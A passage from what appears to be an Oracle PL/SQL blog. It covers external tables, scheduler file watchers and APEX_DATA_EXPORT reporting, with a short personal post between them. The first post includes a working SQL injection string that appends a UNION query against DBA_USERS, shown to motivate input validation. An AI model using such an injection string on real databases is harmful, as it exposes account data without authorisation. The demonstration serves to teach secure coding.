        from nom_nom_xt external modify ( default directory recipies_dir location ('debs_lemon_drizzle_cake.txt') )
    )
    loop
        dbms_output.put_line(r_line.text);
    end loop;
end;
/

Whilst this works with no problems, look what happens when we try to use a variable to specify the filename :

clear screen
set serverout on 
declare
    v_file varchar2(4000) := 'debs_lemon_drizzle_cake.txt';
begin
    for r_line in 
    (
        select text
        from nom_nom_xt 
            external modify 
            ( 
                default directory recipies_dir 
                location (v_file) 
            )
    )
    loop
        dbms_output.put_line(r_line.text);
    end loop;
end;
/
ORA-06550: line 7, column 90: 
PL/SQL: ORA-00905: missing keyword

Specifying the directory in a variable doesn’t work either :

declare
    v_dir varchar2(4000) := 'recipies_dir';
begin
    for r_line in 
    (
        select text
        from nom_nom_xt 
            external modify 
            ( 
                default directory v_dir 
                location ('debs_lemon_drizzle_cake.txt') 
            )
    )
    loop
        dbms_output.put_line(r_line.text);
    end loop;
end;
/

ORA-06564: object V_DIR does not exist

Just in case you’re tempted to solve this by doing something simple like :

clear screen
set serverout on 
declare
    v_dir all_directories.directory_name%type := 'recipies_dir';
    v_file varchar2(100) := 'mikes_beans_on_toast.txt';
    v_stmnt clob := 
        q'[
            select text
            from nom_nom_xt external modify( default directory <dir> location('<file>'))
        ]';
    v_rc sys_refcursor;
    v_text varchar2(4000);
begin
    v_stmnt := replace(replace(v_stmnt, '<dir>', v_dir), '<file>', v_file);
    open v_rc for v_stmnt;
    loop
        fetch v_rc into v_text;
        exit when v_rc%notfound;
        dbms_output.put_line(v_text);
    end loop;
    close v_rc;
end;
/

You should be aware that this approach is vulnerable to SQL Injection.
I know that it’s become fashionable in recent years for “Security” to be invoked as a reason for all kinds of – often questionable – restrictions on the hard-pressed Software Engineer.
So, just in case you’re sceptical about this, here’s a quick demo :

clear screen
set serverout on 
declare
    v_dir varchar2(500) := 
        q'[recipies_dir location ('mikes_beans_on_toast.txt')) union all select username||' '||account_status||' '||authentication_type from dba_users --]';
    v_file varchar2(100) := 'mikes_beans_on_toast.txt';
    v_stmnt varchar2(4000) := q'[select text from nom_nom_xt external modify (default directory <dir> location ('<file>'))]';
    v_rc sys_refcursor;
    v_text varchar2(4000);
begin
    v_stmnt := replace(replace(v_stmnt, '<dir>', v_dir), '<file>', v_file);
    open v_rc for v_stmnt;
    loop
        fetch v_rc into v_text;
        exit when v_rc%notfound;
        dbms_output.put_line(v_text);
    end loop;
    close v_rc;
end;
/

bread
baked beans
butter
SYS OPEN PASSWORD
SYSTEM OPEN PASSWORD
XS$NULL EXPIRED & LOCKED PASSWORD
HR OPEN PASSWORD

...snip...

PL/SQL procedure successfully completed.

If we resort to Dynamic SQL, we can pass the filename into the query as a bind variable :

set serverout on
declare
    v_file varchar2(4000) := 'debs_lemon_drizzle_cake.txt';
    v_stmnt clob := 
        'select text from nom_nom_xt external modify( default directory recipies_dir location (:v_file))';
    v_rc sys_refcursor;
    v_text varchar2(4000);
    v_rtn number;
begin
    open v_rc for v_stmnt using v_file;
    loop
        fetch v_rc into v_text;
        exit when v_rc%notfound;
        dbms_output.put_line( v_text);
        
    end loop;
    close v_rc;
end;
/

…or, if you prefer…

clear screen
set serverout on
declare
    v_file varchar2(120) := 'debs_lemon_drizzle_cake.txt';
    v_stmnt clob := q'[select text from nom_nom_xt external modify( default directory recipies_dir location (:b1))]';
    v_rc sys_refcursor;
    v_text varchar2(4000);
    
    v_curid number;
    v_rtn number;
begin
    v_curid := dbms_sql.open_cursor;
    dbms_sql.parse(v_curid, v_stmnt, dbms_sql.native);
    
    dbms_sql.bind_variable(v_curid, 'b1', v_file);
    
    v_rtn := dbms_sql.execute(v_curid);
    
    v_rc := dbms_sql.to_refcursor(v_curid);
    loop
        fetch v_rc into v_text;
        exit when v_rc%notfound;
        dbms_output.put_line( v_text);
    end loop;
    close v_rc;
end;
/

225g unsalted butter
225g caster sugar
4 free-range eggs
225g self-raising flour
1 unwaxed lemon
85g icing sugar


PL/SQL procedure successfully completed.

However, Oracle remains rather recalcitrant when you try doing the same with the default directory.

RTFM RTOB ( Read the Oracle Base article) !

After a number of “glugs” from a bottle of something rather expensive whilst trawling through the Oracle Documentation for some clues, I happened to look at the Oracle Base article on this topic, which notes that you cannot use bind variables when specifying the Default Directory.

One possible workaround would be to create one external table for each directory that you want to look at.
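If you do go down that route, the only thing that needs to differ between the tables is the DEFAULT DIRECTORY, which gets baked in at creation time. A minimal sketch ( assuming a second directory object called logs_dir exists) :

-- hypothetical second table, fixed to the (assumed) logs_dir directory
create table log_viewer_xt 
(
    line number,
    text varchar2(4000)
)
organization external
(
    type oracle_loader
    default directory logs_dir
    access parameters 
    (
        records delimited by newline
        nologfile
        nobadfile
        nodiscardfile
        fields terminated by '~'
        missing field values are null
        (
            line recnum,
            text char(4000)
        )
    ) 
    location('')
)
reject limit unlimited
/

That way, the only thing you need to supply at runtime is the filename which, as we’ve just seen, can be passed as a bind variable.
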

Alternatively, we can sanitize the incoming value for the DEFAULT DIRECTORY before we drop it into our query.

To this end, DBMS_ASSERT is not going to be much help.
The SQL_OBJECT_NAME function does not recognize Directory Objects…

select dbms_assert.sql_object_name('recipies_dir') from dual;

ORA-44002: invalid object name

… and the SIMPLE_SQL_NAME function will allow pretty much anything if it’s quoted…

select dbms_assert.simple_sql_name(
q'["recipies_dir location('mikes_beans_on_toast.txt')) union all select username from dba_users --"]')
from dual;

DBMS_ASSERT.SIMPLE_SQL_NAME(Q'["RECIPIES_DIRLOCATION('MIKES_BEANS_ON_TOAST.TXT'))UNIONALLSELECTUSERNAMEFROMDBA_USERS--"]')
---------------------------------------------------------------------------
"recipies_dir location('mikes_beans_on_toast.txt')) union all select username from dba_users --"

Time then, to unplug the microwave and cook up something home-made…

I’m running on 19c, so I know that database object names (Directories included) can be no longer than 128 characters.

Additionally, I’m going to assume that we’re following Oracle’s recommendation that quoted identifiers are not used for database object names (including Directories). You can find that pearl of wisdom in the page linked above.

Finally, I want to make sure that a user only accesses a valid directory object on which they have appropriate permissions.

Something like this should get us most of the way :

set serverout on
clear screen
declare
    v_dir varchar2(4000) := 'recipies_dir';
    v_file varchar2(4000) := 'debs_lemon_drizzle_cake.txt';
    v_stmnt clob := 
        'select text from nom_nom_xt external modify( default directory <dir> location (:v_file))';
    v_rc sys_refcursor;
    v_text varchar2(4000);
    v_rtn number;
    
    v_placeholder pls_integer;
    v_found_dir boolean;
    cursor c_valid_dir is
        select null
        from all_directories 
        where directory_name = upper(v_dir);
begin
    if length( v_dir) > 128 then
        raise_application_error(-20101, 'Directory Identifier is too long');
    end if;
    -- Assume allowable characters are alphanumeric and underscore. Reject if it contains anything else
    if regexp_instr(replace(v_dir, '_'), '[[:punct:]]|[[:space:]]') > 0 then
        raise_application_error(-20110, 'Directory Name contains wacky characters');
    end if;    
    open c_valid_dir;
    fetch c_valid_dir into v_placeholder;
    v_found_dir := c_valid_dir%found;
    close c_valid_dir;
    if v_found_dir = false then
        raise_application_error(-20120, 'Directory not found');
    end if;    
    v_stmnt := replace(v_stmnt, '<dir>', v_dir);
    open v_rc for v_stmnt using v_file;
    loop
        fetch v_rc into v_text;
        exit when v_rc%notfound;
        dbms_output.put_line( v_text);
        
    end loop;
    close v_rc;
end;
/

We can now convert this into an Invoker’s Rights package, which restricts access to those directories visible to the calling user :

create or replace package peckish
    authid current_user
as
    type t_nom is table of varchar2(4000);
    
    procedure validate_directory(i_dir in varchar2);

    function recipe( i_dir in varchar2, i_file in varchar2)
        return t_nom pipelined;
        
end peckish;        
/

create or replace package body peckish as

    procedure validate_directory( i_dir in varchar2)
    is
        v_placeholder pls_integer;
        v_found_dir boolean;
        cursor c_valid_dir is
            select null
            from all_directories 
            where directory_name = upper(i_dir);
    begin
        if length( i_dir) > 128 then
            raise_application_error(-20101, 'Directory Identifier is too long');
        end if;
    
        if regexp_instr(replace(i_dir, '_'), '[[:punct:]]|[[:space:]]') > 0 then
            raise_application_error(-20110, 'Directory Name contains wacky characters');
        end if;    
        open c_valid_dir;
        fetch c_valid_dir into v_placeholder;
        v_found_dir := c_valid_dir%found;
        close c_valid_dir;
        if v_found_dir = false then
            raise_application_error(-20120, 'Directory not found');
        end if;    
    end validate_directory;
    
    function recipe( i_dir in varchar2, i_file in varchar2)
        return t_nom pipelined
    is
        v_nom nom_nom_xt%rowtype;
        v_stmnt clob := 
            'select line, text from nom_nom_xt external modify( default directory <dir> location (:v_file))';
        v_rc sys_refcursor;
        v_text varchar2(4000);
       
    begin
        validate_directory(i_dir);
        v_stmnt := replace(v_stmnt, '<dir>', i_dir);            
        open v_rc for v_stmnt using i_file;
        loop
            fetch v_rc into v_nom.line, v_nom.text;
            exit when v_rc%notfound;
            pipe row( v_nom);
        end loop;
        close v_rc;
    end recipe;
end peckish;
/

Let’s run some tests :

select line as line_no, text as ingredient 
from table(peckish.recipe('recipies_dir', 'debs_lemon_drizzle_cake.txt'))
/


   LINE_NO INGREDIENT                              
---------- ----------------------------------------
         1 225g unsalted butter
         2 225g caster sugar
         3 4 free-range eggs
         4 225g self-raising flour
         5 1 unwaxed lemon
         6 85g icing sugar

6 rows selected.

select text as ingredient
from table (
    peckish.recipe(
        'this_is_a_very_long_identifier_to_check_that_the_length_restriction_works_as_expected._Is_that_128_characters_yet_?_Apparently_not_Oh_well_lets_keep_going_for_a_bit',
        'mikes_beans_on_toast.txt'
    ))
/

ORA-20101: Directory Identifier is too long



select text as ingredient
from table(
    peckish.recipe
    (
        q'["recipies_dir location('mikes_beans_on_toast.txt')) union all select username from dba_users --"]',
        'debs_lemon_drizzle_cake.txt'
    ))
/

ORA-20110: Directory Name contains wacky characters


select text as ingredient
from table (peckish.recipe('super_secret_dir', 'mikes_beans_on_toast.txt'))
/

ORA-20120: Directory not found

All of which has left me feeling rather in the mood for a snack. I wonder if there’s any of that cake left ?

Freddie Starr Ate My File ! Finding out exactly what the Oracle Filewatcher is up to

Mon, 2024-04-15 01:30

As useful as they undoubtedly are, any use of DBMS_SCHEDULER File Watchers in Oracle is likely to involve a number of moving parts.
This can make trying to track down issues feel a bit like being on a hamster wheel.
Fortunately, you can easily find out just exactly what the filewatcher is up to, if you know where to look …

I’ve got a procedure to populate a table with details of any arriving file.

create table incoming_files(
    destination VARCHAR2(4000),
    directory_path VARCHAR2(4000),
    actual_file_name VARCHAR2(4000),
    file_size NUMBER,
    file_timestamp TIMESTAMP WITH TIME ZONE)
/    

create or replace procedure save_incoming_file( i_result sys.scheduler_filewatcher_result)
as
begin
    insert into incoming_files( 
        destination, 
        directory_path, 
        actual_file_name, 
        file_size, 
        file_timestamp)
    values(
        i_result.destination,
        i_result.directory_path,
        i_result.actual_file_name,
        i_result.file_size,
        i_result.file_timestamp);
end;
/

The filewatcher and associated objects that will invoke this procedure are :

begin
    dbms_credential.create_credential
    (
        credential_name => 'starr',
        username => 'fstarr',
        password => 'some-complex-password'
    );
end;
/

begin
    dbms_scheduler.create_file_watcher(
        file_watcher_name => 'freddie',
        directory_path => '/u01/app/upload_files',
        file_name => '*.txt',
        credential_name => 'starr',
        enabled => false,
        comments => 'Feeling peckish');
end;
/



begin
    dbms_scheduler.create_program(
        program_name => 'snack_prog',
        program_type => 'stored_procedure',
        program_action => 'save_incoming_file',
        number_of_arguments => 1,
        enabled => false);
         
    -- need to make sure this program can see the message sent by the filewatcher...
    dbms_scheduler.define_metadata_argument(
        program_name => 'snack_prog',
        metadata_attribute => 'event_message',
        argument_position => 1);
         
    -- Create a job that links the filewatcher to the program...
    dbms_scheduler.create_job(
        job_name => 'snack_job',
        program_name => 'snack_prog',
        event_condition => null,
        queue_spec => 'freddie',
        auto_drop => false,
        enabled => false);
end;
/

The relevant components have been enabled :

begin
    dbms_scheduler.enable('freddie');
    dbms_scheduler.enable('snack_prog');
    dbms_scheduler.enable('snack_job');
end;
/

… and – connected on the os as fstarr – I’ve dropped a file into the directory…

echo 'Squeak!' >/u01/app/upload_files/hamster.txt

Watching the (File)Watcher

File watchers are initiated by a scheduled run of the SYS.FILE_WATCHER job.

The logging_level value determines whether or not the executions of this job will be available in the *_SCHEDULER_JOB_RUN_DETAILS views.

select program_name, schedule_name, 
    job_class, logging_level
from dba_scheduler_jobs
where owner = 'SYS'
and job_name = 'FILE_WATCHER'
/
PROGRAM_NAME         SCHEDULE_NAME             JOB_CLASS                           LOGGING_LEVEL  
-------------------- ------------------------- ----------------------------------- ---------------
FILE_WATCHER_PROGRAM FILE_WATCHER_SCHEDULE     SCHED$_LOG_ON_ERRORS_CLASS          FULL           

If the logging_level is set to OFF (which appears to be the default in 19c), you can enable it by connecting as SYSDBA and running :

begin
    dbms_scheduler.set_attribute('FILE_WATCHER', 'logging_level', dbms_scheduler.logging_full);
end;
/

The job is assigned the FILE_WATCHER_SCHEDULE, which runs every 10 minutes by default. To check the current settings :

select repeat_interval
from dba_scheduler_schedules
where schedule_name = 'FILE_WATCHER_SCHEDULE'
/

REPEAT_INTERVAL               
------------------------------
FREQ=MINUTELY;INTERVAL=10
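
Incidentally, if you want the filewatcher to poll more frequently, you should be able to change the schedule’s repeat_interval ( as a suitably privileged user; the 2 minute interval here is just an example) :

begin
    -- example only : poll every 2 minutes instead of the default 10
    dbms_scheduler.set_attribute
    (
        name => 'FILE_WATCHER_SCHEDULE',
        attribute => 'repeat_interval',
        value => 'freq=minutely; interval=2'
    );
end;
/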

The thing is, there are times when the SYS.FILE_WATCHER seems to slope off for a tea-break. So, if you’re wondering why your file has not been processed yet, it’s handy to be able to check if this job has run when you expected it to.

In this case, as logging is enabled, we can do just that :

select log_id, log_date, instance_id, req_start_date, actual_start_date
from dba_scheduler_job_run_details
where owner = 'SYS'
and job_name = 'FILE_WATCHER'
and log_date >= sysdate - (1/24)
order by log_date desc
/
LOG_ID  LOG_DATE                            INSTANCE_ID REQ_START_DATE                             ACTUAL_START_DATE                         
------- ----------------------------------- ----------- ------------------------------------------ ------------------------------------------
1282    13-APR-24 14.50.47.326358000 +01:00           1 13-APR-24 14.50.47.000000000 EUROPE/LONDON 13-APR-24 14.50.47.091753000 EUROPE/LONDON
1274    13-APR-24 14.40.47.512172000 +01:00           1 13-APR-24 14.40.47.000000000 EUROPE/LONDON 13-APR-24 14.40.47.075846000 EUROPE/LONDON
1260    13-APR-24 14.30.47.301176000 +01:00           1 13-APR-24 14.30.47.000000000 EUROPE/LONDON 13-APR-24 14.30.47.048977000 EUROPE/LONDON
1248    13-APR-24 14.20.47.941210000 +01:00           1 13-APR-24 14.20.47.000000000 EUROPE/LONDON 13-APR-24 14.20.47.127769000 EUROPE/LONDON
1212    13-APR-24 14.10.48.480193000 +01:00           1 13-APR-24 14.10.47.000000000 EUROPE/LONDON 13-APR-24 14.10.47.153032000 EUROPE/LONDON
1172    13-APR-24 14.00.50.676270000 +01:00           1 13-APR-24 14.00.47.000000000 EUROPE/LONDON 13-APR-24 14.00.47.111936000 EUROPE/LONDON

6 rows selected. 

Even if the SYS.FILE_WATCHER is not logging, when it does run, any files being watched for are added to a queue, the contents of which can be found in SCHEDULER_FILEWATCHER_QT.
This query will get you the really useful details of what your filewatcher has been up to :

select 
    t.step_no,
    treat( t.user_data as sys.scheduler_filewatcher_result).actual_file_name as filename,
    treat( t.user_data as sys.scheduler_filewatcher_result).file_size as file_size,
    treat( t.user_data as sys.scheduler_filewatcher_result).file_timestamp as file_ts,
    t.enq_time,
    x.name as filewatcher,
    x.requested_file_name as search_pattern,
    x.credential_name as credential_name
from sys.scheduler_filewatcher_qt t,
    table(t.user_data.matching_requests) x
where enq_time > trunc(sysdate)
order by enq_time
/

  STEP_NO FILENAME         FILE_SIZE FILE_TS                          ENQ_TIME                     FILEWATCHER     SEARCH_PATTERN  CREDENTIAL_NAME
---------- --------------- ---------- -------------------------------- ---------------------------- --------------- --------------- ---------------
         0 hamster.txt              8 13-APR-24 12.06.58.000000000 GMT 13-APR-24 12.21.31.746338000 FREDDIE         *.txt           STARR          

Happily, in this case, our furry friend has avoided the Grim Squaker…

NOTE – No hamsters were harmed in the writing of this post.

If you think I’m geeky, you should meet my friend.

Sat, 2024-03-16 11:14

I’d like to talk about a very good friend of mine.
Whilst he’s much older than me ( 11 or 12 weeks at least), we do happen to share interests common to programmers of a certain vintage.

About a year ago, he became rather unwell.
Since then, whenever I’ve gone to visit, I’ve taken care to wear something that’s particular to our friendship and/or appropriately geeky.

At one point, when things were looking particularly dicey, I promised him, that whilst “Captain Scarlet” was already taken, if he came through he could pick any other colour he liked.
As a life-long Luton Town fan, his choice was somewhat inevitable.
So then, what follows – through the medium of Geeky T-shirts – is a portrait of my mate Simon The Indestructible Captain Orange…

When we first met, Windows 3.1 was still on everyone’s desktop and somewhat prone to hanging at inopportune moments. Therefore, we are fully aware of both the origins and continuing relevance of this particular pearl of wisdom :

Fortunately, none of the machines Simon was wired up to in the hospital seemed to be running any version of Windows so I thought he’d be reassured by this :

Whilst our first meeting did not take place on a World riding through space on the back of a Giant Turtle ( it was, in fact, in Milton Keynes), Simon did earn my eternal gratitude by recommending the book Good Omens – which proved to be my gateway to Discworld.
The relevance of this next item of “Geek Chic” is that, when Simon later set up his own company, he decided that it should have a Latin motto.
In this, he was inspired by the crest of the Ankh-Morpork Assassins’ Guild :

His motto :

Nil codex sine Lucre

…which translates as …

No code without payment

From mottoes to something more akin to a mystic incantation, chanted whenever you’re faced with a seemingly intractable technical issue. Also, Simon likes this design so…

As we both know, there are 10 types of people – those who understand binary and those who don’t…

When confronted by something like this, I am able to recognise that the binary numbers are ASCII codes representing alphanumeric characters. However, I’ve got nothing on Simon, a one-time Assembler Programmer.
Whilst I’m mentally removing my shoes and socks in preparation to translate the message, desperately trying to remember the golden rule of binary maths ( don’t forget to carry the 1), he’ll just come straight out with the answer (“Geek”, in this case).

Saving the geekiest to last, I’m planning to dazzle with this on my next visit :

Techie nostalgia and a Star Wars reference all on the one t-shirt. I don’t think I can top that. Well, not for now anyway.

Using the APEX_DATA_EXPORT package directly from PL/SQL

Mon, 2024-01-29 01:30

As Data Warehouse developers, there is frequently a need for us to produce user reports in a variety of formats (ok, Excel).
Often these reports are the output of processes running as part of an unattended batch.
In the past I’ve written about some of the solutions out there for creating csv files and, of course Excel.

The good news is that, since APEX 20.2, Oracle provides the ability to do this out-of-the-box by means of the APEX_DATA_EXPORT PL/SQL package.
The catch is that you need to have an active APEX session to call it.
Which means you need to have an APEX application handy.

Fortunately, it is possible to initiate an APEX session and call this package without going anywhere near the APEX UI itself, as you’ll see shortly.

Specifically, what we’ll cover is :

  • generating comma-separated (CSV) output
  • generating an XLSX file
  • using the ADD_AGGREGATE procedure to add a summary
  • using the ADD_HIGHLIGHT procedure to apply conditional formatting
  • using the GET_PRINT_CONFIG function to apply document-wide styling

Additionally, we’ll explore how to create a suitable APEX Application from a script if one is not already available.

Incidentally, the scripts in this post can be found in this Github Repo.

Before I go any further, I should acknowledge the work of Amirreza Rastandeh, whose LinkedIn article inspired this post.

A quick word on the Environment I used in these examples – it’s an Oracle supplied VirtualBox appliance running Oracle 23c Free Database and APEX 22.2.

Generating CSV output

APEX_DATA_EXPORT offers a veritable cornucopia of output formats. However, to begin with, let’s keep things simple and just generate a CSV into a CLOB object so that we can check the contents directly from within a script.

We will need to call APEX_SESSION.CREATE_SESSION and pass it some details of an Apex application in order for this to work so the first thing we need to do is to see if we have such an application available :

select workspace, application_id, page_id, page_name
from apex_application_pages
order by page_id
/

WORKSPACE                      APPLICATION_ID    PAGE_ID PAGE_NAME           
------------------------------ -------------- ---------- --------------------
HR_REPORT_FILES                           105          0 Global Page
HR_REPORT_FILES                           105          1 Home
HR_REPORT_FILES                           105       9999 Login Page

As long as we get at least one row back from this query, we’re good to go. Now for the script itself (called csv_direct.sql) :

set serverout on size unlimited
clear screen

declare

    cursor c_apex_app is
        select ws.workspace_id, ws.workspace, app.application_id, app.page_id
        from apex_application_pages app
        inner join apex_workspaces ws
            on ws.workspace = app.workspace
        order by page_id;    

    v_apex_app c_apex_app%rowtype;    
   
    v_stmnt varchar2(32000);
    v_context apex_exec.t_context;
    v_export apex_data_export.t_export;
begin

    dbms_output.put_line('Getting app details...');
    -- We only need the first record returned by this cursor 
    open c_apex_app; 
    fetch c_apex_app into v_apex_app;
    close c_apex_app;
    
    apex_util.set_workspace(v_apex_app.workspace);
    
    dbms_output.put_line('Creating session');

    apex_session.create_session
    (
        p_app_id => v_apex_app.application_id,
        p_page_id => v_apex_app.page_id,
        p_username => 'anynameyoulike' -- this parameter is mandatory but can be any string apparently
    );
    
    v_stmnt := 'select * from departments';

    dbms_output.put_line('Opening context');
    
    v_context := apex_exec.open_query_context
    (
        p_location => apex_exec.c_location_local_db,
        p_sql_query => v_stmnt
    );    
    
    dbms_output.put_line('Running Report');
    v_export := apex_data_export.export
    (
        p_context => v_context,
        p_format => 'CSV', -- patience ! We'll get to the Excel shortly.
        p_as_clob => true -- by default the output is saved as a blob. This overrides to save as a clob
    );
    
    apex_exec.close( v_context);

    dbms_output.put_line(v_export.content_clob);
end;
/
        

Running this we get :

Getting app details...
Creating session
Opening context
Running Report
DEPARTMENT_ID,DEPARTMENT_NAME,MANAGER_ID,LOCATION_ID
10,Administration,200,1700
20,Marketing,201,1800
30,Purchasing,114,1700
40,Human Resources,203,2400
50,Shipping,121,1500
60,IT,103,1400
70,Public Relations,204,2700
80,Sales,145,2500
90,Executive,100,1700
100,Finance,108,1700
110,Accounting,205,1700
120,Treasury,,1700
130,Corporate Tax,,1700
140,Control And Credit,,1700
150,Shareholder Services,,1700
160,Benefits,,1700
170,Manufacturing,,1700
180,Construction,,1700
190,Contracting,,1700
200,Operations,,1700
210,IT Support,,1700
220,NOC,,1700
230,IT Helpdesk,,1700
240,Government Sales,,1700
250,Retail Sales,,1700
260,Recruiting,,1700
270,Payroll,,1700



PL/SQL procedure successfully completed.

We can get away with using DBMS_OUTPUT as the result set is comparatively small. Under normal circumstances, you’ll probably want to save it into a table ( as in Amirreza’s post), or write it out to a file.
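
If the table option appeals, it needn’t be anything fancy. A minimal sketch ( the REPORT_OUTPUT table here is entirely made up) :

-- hypothetical table for holding report output
create table report_output
(
    report_name varchar2(128),
    created_at timestamp default systimestamp,
    content clob
)
/

-- ...then, in place of the dbms_output call at the end of the block above...
insert into report_output( report_name, content)
values( 'departments_csv', v_export.content_clob);

commit;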

In fact, writing to a file is exactly what we’ll be doing with the Excel output we’ll generate shortly.

First though, what if you don’t have a suitable APEX application lying around…

Creating an APEX application from SQL

NOTE – you only need to do this if you do not already have a suitable APEX Application available.
If you do then feel free to skip to the next bit, where we finally start generating XLSX files !

First, we need to check to see if there is an APEX workspace present for us to create the Application in :

select workspace, workspace_id
from apex_workspaces;

If this returns any rows then you should be OK to pick one of the workspaces listed and create your application in that.

Otherwise, you can create a Workspace by connecting to the database as a user with the APEX_ADMINISTRATOR_ROLE and running :

exec apex_instance_admin.add_workspace( p_workspace => 'HR_REPORT_FILES', p_primary_schema => 'HR');

…where HR_REPORT_FILES is the name of the workspace you want to create and HR is a schema that has access to the database objects you want to run your reports against.

Next, following Jeffrey Kemp’s sage advice, I can just create and then export an Application on any compatible APEX instance and then simply import the resulting file.
That’s right, it’ll work irrespective of the environment on which the export file is created, as long as it’s a compatible APEX version.
If you need them, the instructions for exporting an APEX application are here.

I’ve just clicked through the Create Application Wizard to produce an empty application using the HR schema and have then exported it to a file called apex22_hr_report_files_app.sql.

To import it, I ran the following script:

begin
    apex_application_install.set_workspace('HR_REPORT_FILES');
    apex_application_install.generate_application_id;
    apex_application_install.generate_offset;
end;
/

@/home/mike/Downloads/apex22_hr_report_files_app.sql

Once it’s run we can confirm that the import was successful :

select application_id, application_name,
page_id, page_name
from apex_application_pages
where workspace = 'HR_REPORT_FILES'
/

APPLICATION_ID APPLICATION_NAME        PAGE_ID PAGE_NAME           
-------------- -------------------- ---------- --------------------
           105 Lazy Reports                  0 Global Page
           105 Lazy Reports                  1 Home
           105 Lazy Reports               9999 Login Page

The add_workspace.sql script in the Github Repo executes both the create workspace and application import steps described here.

Right, where were we…

Generating an Excel file

First we’ll need a directory object so we can write our Excel file out to disk. So, as a suitably privileged user :

create or replace directory hr_reports as '/opt/oracle/hr_reports';

grant read, write on directory hr_reports to hr;

OK – now to generate our report as an Excel…

set serverout on size unlimited
clear screen

declare

    cursor c_apex_app is
    select ws.workspace_id, ws.workspace, app.application_id, app.page_id
    from apex_application_pages app
    inner join apex_workspaces ws
        on ws.workspace = app.workspace
    order by page_id;    

    v_apex_app c_apex_app%rowtype;    

    v_stmnt varchar2(32000);
    v_context apex_exec.t_context;
    
    v_export apex_data_export.t_export;
    
    -- File handling variables
    v_dir all_directories.directory_name%type := 'HR_REPORTS';
    v_fname varchar2(128) := 'hr_departments_reports.xlsx';

    v_fh utl_file.file_type;
    v_buffer raw(32767);
    v_amount integer := 32767;
    v_pos integer := 1;
    v_length integer;
    
begin

    open c_apex_app; 
    fetch c_apex_app into v_apex_app;
    close c_apex_app;
    
    apex_util.set_workspace(v_apex_app.workspace);

    
    v_stmnt := 'select * from departments';

    apex_session.create_session
    (
        p_app_id => v_apex_app.application_id,
        p_page_id => v_apex_app.page_id,
        p_username => 'whatever' -- any string will do !
    );
    
   -- Create the query context...
    v_context := apex_exec.open_query_context
    (
        p_location => apex_exec.c_location_local_db,
        p_sql_query => v_stmnt
    );    

    -- ...and export the data into the v_export object
    -- this time use the default - i.e. export to a BLOB, rather than a CLOB
    v_export := apex_data_export.export
    (
        p_context => v_context,
        p_format => apex_data_export.c_format_xlsx -- XLSX
    );
    
    apex_exec.close( v_context);
    
    dbms_output.put_line('Writing file');

    -- Now write the blob out to an xlsx file

    v_length := dbms_lob.getlength( v_export.content_blob);
    v_fh := utl_file.fopen( v_dir, v_fname, 'wb', 32767);
        
    while v_pos <= v_length loop
        dbms_lob.read( v_export.content_blob, v_amount, v_pos, v_buffer);
        utl_file.put_raw(v_fh, v_buffer, true);
        v_pos := v_pos + v_amount;
    end loop;
        
    utl_file.fclose( v_fh);
    dbms_output.put_line('File written to HR_REPORTS');

exception when others then
    dbms_output.put_line(sqlerrm);
    if utl_file.is_open( v_fh) then
        utl_file.fclose(v_fh);
    end if;    
end;
/

As you can see, this script is quite similar to the csv version. The main differences are that, firstly, we’re saving the output as a BLOB rather than a CLOB, simply by not overriding the default behaviour when calling APEX_DATA_EXPORT.EXPORT.

Secondly, we’re writing the result out to a file.

Once we retrieve the file and open it, we can see that indeed, it is in xlsx format :

As well as generating a vanilla spreadsheet, APEX_DATA_EXPORT does have a few more tricks up its sleeve…

Adding an Aggregation

We can add a row count to the bottom of our report by means of the ADD_AGGREGATE procedure.
To do so, we need to modify the report query to produce the data to be used by the aggregate :

select department_id, department_name, manager_id, location_id,
    count( 1) over() as record_count
from departments

As we don’t want to list the record count on every row, we need to exclude the record_count column from the result set by specifying the columns that we do actually want in the output. We can do this with calls to the ADD_COLUMN procedure :

    apex_data_export.add_column( p_columns => v_columns, p_name => 'DEPARTMENT_ID');
    apex_data_export.add_column( p_columns => v_columns, p_name => 'DEPARTMENT_NAME');
    apex_data_export.add_column( p_columns => v_columns, p_name => 'MANAGER_ID');
    apex_data_export.add_column( p_columns => v_columns, p_name => 'LOCATION_ID');

NOTE – column names passed in the P_NAME parameter in this procedure need to be in UPPERCASE.

Finally, we need to specify the aggregate itself using the ADD_AGGREGATE procedure :

    apex_data_export.add_aggregate
    (
        p_aggregates => v_aggregates,
        p_label => 'Data Row Count',
        p_display_column => 'DEPARTMENT_ID',
        p_value_column => 'RECORD_COUNT'
    );    

The finished script is called excel_aggregate.sql :

set serverout on size unlimited
clear screen

declare

    cursor c_apex_app is
        select ws.workspace_id, ws.workspace, app.application_id, app.page_id
        from apex_application_pages app
        inner join apex_workspaces ws
            on ws.workspace = app.workspace
        order by page_id;    

    v_apex_app c_apex_app%rowtype;    
   
    v_stmnt varchar2(32000);
    
    v_columns apex_data_export.t_columns;
    v_aggregates  apex_data_export.t_aggregates;
    
    v_context apex_exec.t_context;
    v_export apex_data_export.t_export;
    
    -- File handling variables
    v_dir all_directories.directory_name%type := 'HR_REPORTS';
    v_fname varchar2(128) := 'aggregate.xlsx';

    v_fh utl_file.file_type;
    v_buffer raw(32767);
    v_amount integer := 32767;
    v_pos integer := 1;
    v_length integer;
    
begin

    -- We only need the first record returned by this cursor 
    open c_apex_app; 
    fetch c_apex_app into v_apex_app;
    close c_apex_app;
    
    apex_util.set_workspace(v_apex_app.workspace);
    
    apex_session.create_session
    (
        p_app_id => v_apex_app.application_id,
        p_page_id => v_apex_app.page_id,
        p_username => 'anynameyoulike' 
    );
    
    
    -- Add a row with a count of the records in the file
    -- We need to add the relevant data to the query and then format it
    v_stmnt := 
        'select department_id, department_name, manager_id, location_id,  
            count( 1) over() as record_count 
         from departments';

    -- Include only the data columns we want to display on the report, not the record_count
    -- NOTE - in all of these procs, column names need to be passed as upper case literals
    apex_data_export.add_column( p_columns => v_columns, p_name => 'DEPARTMENT_ID');
    apex_data_export.add_column( p_columns => v_columns, p_name => 'DEPARTMENT_NAME');
    apex_data_export.add_column( p_columns => v_columns, p_name => 'MANAGER_ID');
    apex_data_export.add_column( p_columns => v_columns, p_name => 'LOCATION_ID');
    
    apex_data_export.add_aggregate
    (
        p_aggregates => v_aggregates,
        p_label => 'Data Row Count',
        p_display_column => 'DEPARTMENT_ID',
        p_value_column => 'RECORD_COUNT'
    );    

    v_context := apex_exec.open_query_context
    (
        p_location => apex_exec.c_location_local_db,
        p_sql_query => v_stmnt
    );    

    v_export := apex_data_export.export
    (
        p_context => v_context,
        p_format => apex_data_export.c_format_xlsx, -- XLSX
        p_columns => v_columns,
        p_aggregates => v_aggregates
    );
    
    apex_exec.close( v_context);
    
    v_length := dbms_lob.getlength( v_export.content_blob);
